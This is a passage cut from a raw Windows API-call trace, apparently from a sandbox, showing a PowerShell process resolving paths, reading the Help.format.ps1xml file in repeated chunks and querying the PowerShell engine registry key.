lpBuffer=0x1cdc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.750] GetLastError () returned 0x0 [0026.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.750] GetLastError () returned 0x0 [0026.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.751] GetLastError () returned 0x0 [0026.751] VirtualQuery (in: lpAddress=0x1cd0c0, lpBuffer=0x1ce0c0, dwLength=0x1c | out: lpBuffer=0x1ce0c0*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.751] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x97c01c72, Data2=0xe237, Data3=0x41b0, Data4=([0]=0x9a, [1]=0x1f, [2]=0x31, [3]=0x24, [4]=0x97, [5]=0xf3, [6]=0x44, [7]=0x45))) returned 0x0 [0026.752] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.752] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x303b5ee9, Data2=0x6ea5, Data3=0x480d, Data4=([0]=0x8e, [1]=0xa5, [2]=0xa, [3]=0xa7, [4]=0xf6, [5]=0x31, [6]=0x51, [7]=0x7))) returned 0x0 [0026.752] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x342f9ebe, Data2=0x3465, Data3=0x4473, Data4=([0]=0xbb, [1]=0xee, [2]=0xb4, [3]=0x1d, [4]=0xd1, [5]=0xba, [6]=0xf9, [7]=0xb4))) returned 0x0 [0026.752] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x749b9d99, Data2=0xda30, Data3=0x4d34, Data4=([0]=0xbb, [1]=0x1d, [2]=0x75, [3]=0xd7, [4]=0xd8, [5]=0xc5, [6]=0xdf, [7]=0x10))) returned 0x0 [0026.752] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.752] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0026.753] GetLastError () returned 0x0 [0026.753] SetErrorMode (uMode=0x1) returned 0x1 [0026.753] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.753] GetLastError () returned 0x0 [0026.753] GetFileType (hFile=0x2f8) returned 0x1 [0026.753] SetErrorMode (uMode=0x1) returned 0x1 [0026.753] GetFileType (hFile=0x2f8) returned 0x1 [0026.753] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.755] GetLastError () returned 0x0 [0026.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.756] GetLastError () returned 0x0 [0026.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.756] GetLastError () returned 0x0 [0026.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.756] GetLastError () returned 0x0 [0026.757] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.757] GetLastError () returned 0x0 [0026.757] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.757] GetLastError () returned 0x0 [0026.757] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.757] GetLastError () returned 0x0 [0026.757] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.757] GetLastError () returned 0x0 [0026.758] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.758] GetLastError () returned 0x0 [0026.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.759] GetLastError () returned 0x0 [0026.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.759] GetLastError () returned 0x0 [0026.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.759] GetLastError () returned 0x0 [0026.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.759] GetLastError () returned 0x0 [0026.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.759] GetLastError () returned 0x0 [0026.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.760] GetLastError () returned 0x0 [0026.760] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.760] GetLastError () returned 0x0 [0026.762] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.762] GetLastError () returned 0x0 [0026.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.763] GetLastError () returned 0x0 [0026.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.763] GetLastError () returned 0x0 [0026.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.763] GetLastError () returned 0x0 [0026.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.763] GetLastError () returned 0x0 [0026.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.763] GetLastError () returned 0x0 [0026.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.763] GetLastError () returned 0x0 [0026.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.764] GetLastError () returned 0x0 [0026.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.764] GetLastError () returned 0x0 [0026.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.764] GetLastError () returned 0x0 [0026.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.764] GetLastError () returned 0x0 [0026.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.764] GetLastError () returned 0x0 [0026.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.765] GetLastError () returned 0x0 [0026.765] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.765] GetLastError () returned 0x0 [0026.765] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.765] GetLastError () returned 0x0 [0026.765] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.765] GetLastError () returned 0x0 [0026.780] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.780] GetLastError () returned 0x0 [0026.780] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.780] GetLastError () returned 0x0 [0026.780] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.780] GetLastError () returned 0x0 [0026.780] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.780] GetLastError () returned 0x0 [0026.781] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.781] GetLastError () returned 0x0 [0026.781] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.781] GetLastError () returned 0x0 [0026.781] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.781] GetLastError () returned 0x0 [0026.781] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.781] GetLastError () returned 0x0 [0026.781] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.781] GetLastError () returned 0x0 [0026.781] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.781] GetLastError () returned 0x0 [0026.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.782] GetLastError () returned 0x0 [0026.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.782] GetLastError () returned 0x0 [0026.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.782] GetLastError () returned 0x0 [0026.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.782] GetLastError () returned 0x0 [0026.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.782] GetLastError () returned 0x0 [0026.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.782] GetLastError () returned 0x0 [0026.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.783] GetLastError () returned 0x0 [0026.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.783] GetLastError () returned 0x0 [0026.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.783] GetLastError () returned 0x0 [0026.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.783] GetLastError () returned 0x0 [0026.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.783] GetLastError () returned 0x0 [0026.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.783] GetLastError () returned 0x0 [0026.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.784] GetLastError () returned 0x0 [0026.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.784] GetLastError () returned 0x0 [0026.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.784] GetLastError () returned 0x0 [0026.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.784] GetLastError () returned 0x0 [0026.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.784] GetLastError () returned 0x0 [0026.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.785] GetLastError () returned 0x0 [0026.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.785] GetLastError () returned 0x0 [0026.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.785] GetLastError () returned 0x0 [0026.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0xf37, lpOverlapped=0x0) returned 1 [0026.785] GetLastError () returned 0x0 [0026.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x23efef7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23efef7*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.785] GetLastError () returned 0x0 [0026.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x23f0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23f0820*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.785] GetLastError () returned 0x0 [0026.785] CloseHandle (hObject=0x2f8) returned 1 [0026.786] GetLastError () returned 0x0 [0026.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0026.786] GetLastError () returned 0x0 [0026.786] SetErrorMode (uMode=0x1) returned 0x1 [0026.786] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x241181c | out: lpFileInformation=0x241181c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0026.786] GetLastError () returned 0x0 [0026.786] SetErrorMode (uMode=0x1) returned 0x1 [0026.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0026.786] GetLastError () returned 0x0 [0026.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.786] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.786] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.786] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, 